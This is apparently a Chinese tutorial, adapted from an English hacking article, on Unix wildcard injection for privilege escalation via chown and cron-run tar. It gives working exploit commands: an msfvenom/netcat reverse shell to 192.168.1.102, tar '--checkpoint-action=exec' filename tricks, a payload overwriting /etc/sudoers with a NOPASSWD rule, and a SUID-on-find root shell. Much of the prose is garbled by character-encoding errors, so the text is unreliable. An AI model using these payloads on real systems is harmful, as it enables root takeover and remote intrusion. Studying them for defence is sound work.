通配符注入（Wildcard Injection）是一有趣的老式Unix黑客技術(shù)。
個(gè)人感覺(jué)，就是用“特殊的文件名”來(lái)輔助執(zhí)行命令。

通配符

[]的特殊例子

[]：匹配范圍
[^]：排除匹配范圍
[:alnum:]：所有字母和數(shù)字
[:alpha:]：所有字母
[:digit:]：所有數(shù)字
[:lower:]：所有小寫字母
[:upper:]：所有大寫字母
[:blank:]：空白字符和TAB制表符
[:space:]：包括空白字符、TAB制表符(\t)、換頁(yè)(\f)
[:cntrl:]：所有控制字符
[:graph:]：可打印并可看到的字符?？崭袷强纱蛴〉?，但是不是可看到的。
[:print:]：所有可打印字符
[:punct:]：所有標(biāo)點(diǎn)符號(hào)，非字母、數(shù)字、控制字符和space字符。
[:xdigit:]：十六進(jìn)制數(shù)的字符。

特殊變量
IFS 分隔符，<space>或<tab>或<enter>三者之一組成(我們常用space)。
CR 由<enter>產(chǎn)生。

簡(jiǎn)單的實(shí)例1

首先建立3個(gè)文件，各自寫入了一行內(nèi)容

cd /Desktop
mkdir wild
cd wild
echo "Hello Friends" > file1
echo "This is Wildcard Injection" > file2
echo "take help" > --help

之后用cat命令查看這些文件

cat file1
cat file 2
cat --help

前兩個(gè)是不會(huì)有異常的，但是在嘗試讀取--help這個(gè)文件的時(shí)候，顯示的不是take help，而是從自己的庫(kù)中調(diào)用自己的-help選項(xiàng)，這種類型的技巧稱為Wildcard wildness。

通過(guò)Chown劫持文件所有者

利用chown命令可以改變文件的所有者，一般用戶沒(méi)有普通權(quán)限更改別人文件的所有者，除了root。

超級(jí)管理員用戶 (root) – 執(zhí)行chown命令。
非root用戶1（raj） – 執(zhí)行普通任務(wù)，如創(chuàng)建文件
非root用戶2（aarti） – 執(zhí)行普通任務(wù)，如創(chuàng)建文件
惡意用戶（Ignite） – 注入chown命令
在下圖中你可以看到，所有PHP文件的所有者均為raj用戶。

chown有個(gè)參數(shù)--reference，作用如下，
With --reference, change the owner and group of each FILE to those of RFILE.“克隆”參考文件的權(quán)限到你指定的文件或目錄上。

cd
ls -al
echo "" > my.php
echo > --reference=my.php

當(dāng)root用戶使用通配符*修改所有PHP文件所有權(quán)時(shí)，ignite用戶將取得所有文件間接所有權(quán)。

chown -R aarti:aarti *.php
ls -al

tar命令的利用

創(chuàng)建一些文件，然后用crontab命令定時(shí)備份

nano /etc/crontab
*/1 *   * * *   root tar -zcf /var/backups/html.tgz /var/www/html/*

crontab和tar通配符注入

假設(shè)現(xiàn)在以一個(gè)普通用戶的身份登陸終端，嘗試提權(quán)到root。然后cat /etc/crontab查看計(jì)劃任務(wù)。

本機(jī)用msfvenom生成一個(gè)netcat反彈語(yǔ)句
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R
然后復(fù)制到ssh中，cd到要打包的目錄中

echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

可以先執(zhí)行tar cf archive.tar *看看觸發(fā)的效果，crontab中的tar是root權(quán)限運(yùn)行的，所以就等著反彈root會(huì)話吧。

--checkpoint[=NUM??BER] (翻譯起來(lái)繞口) 按百分幾顯示處理進(jìn)度？
--checkpoint-action = ACTION 在每個(gè)檢查點(diǎn)上執(zhí)行指定的操作

有錯(cuò)誤的第二個(gè)例子

原作者是這樣子的

cd /tmp
mkdir data
chmod 777 data
cd data
echo "" > f1
echo "" > f2
echo "" > f3

在其他目錄中編寫一個(gè)bash腳本，tar打包/tmp/data。

mkdir info
cd info
nano script.sh
chmod 777 script.sh

注意，這個(gè)shell的內(nèi)容是這樣的

#!/bin/bash
cd /tmp/data
tar cf /backup/backup.tgz *

手動(dòng)執(zhí)行這個(gè)腳本就會(huì)發(fā)現(xiàn)，根本不會(huì)自動(dòng)切換到/tmp/data目錄。

這是因?yàn)閟hell在執(zhí)行腳本時(shí)，會(huì)創(chuàng)建一個(gè)子shell，并在子shell中逐個(gè)執(zhí)行腳本中的指令。 在子shell中已經(jīng)切換了目錄了，但是子shell一旦執(zhí)行完，馬上退出，子shell中的變量和操作全部都收回。回到終端根本就看不到這個(gè)過(guò)程的變化。

解決辦法

執(zhí)行source c.sh，這時(shí)候就是直接在終端的shell執(zhí)行腳本了，沒(méi)有生成子shell，執(zhí)行的結(jié)果就是輸出歷史命令，并且切換了目錄。
每次都要輸入source是一件煩瑣的事情，其實(shí)source命令又叫點(diǎn)命令，所以執(zhí)行. ./c.sh是一樣的效果，注意：.和.中間有個(gè)空格！

tar+crontab+sudoers

就是用crontab改了sudoers文件的內(nèi)容

echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

tar+crontab+suid

圖略，就是用crontab改變文件的suid實(shí)現(xiàn)提權(quán)

echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
ls -al /usr/bin/find
find f1 -exec "whoami" \;
root
find f1 -exec "/bin/sh" \;
id
whoami

在ctf中的利用

看完上面的通配符注入，再看看這個(gè)，p神博客寫的無(wú)字母數(shù)字webshell之提高篇

覺(jué)得看不夠的話還可以接著看下面這兩個(gè)

【CTF 攻略】如何繞過(guò)四個(gè)字符限制getshell
https://www.anquanke.com/post/id/87203
命令注入突破長(zhǎng)度限制
https://www.freebuf.com/articles/web/154453.html

注意，代碼不能隨便亂插，否則就被審核了
原文：https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/